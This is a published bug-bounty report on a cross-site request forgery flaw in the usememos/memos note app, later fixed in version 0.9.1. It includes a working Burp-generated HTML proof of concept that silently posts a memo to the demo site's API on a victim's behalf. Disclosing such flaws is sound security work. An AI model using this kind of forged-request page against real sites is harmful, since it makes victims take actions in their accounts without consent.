Add any thoughts via CSRF in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

An attacker can add any user thoughts via a CSRF attack

When you send a link to the victim and click on it, any thoughts will be added

Proof of Concept

1- When the attacker adds any thoughts, it then intercepts the request

2- Take this request to generate a CSRF PoC

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">

      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources fix CSRF

Add CSRF Token

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

Impact

An attacker can add any user thoughts via a CSRF attack

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
STEVEN validated this vulnerability a year ago
samirwaleed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation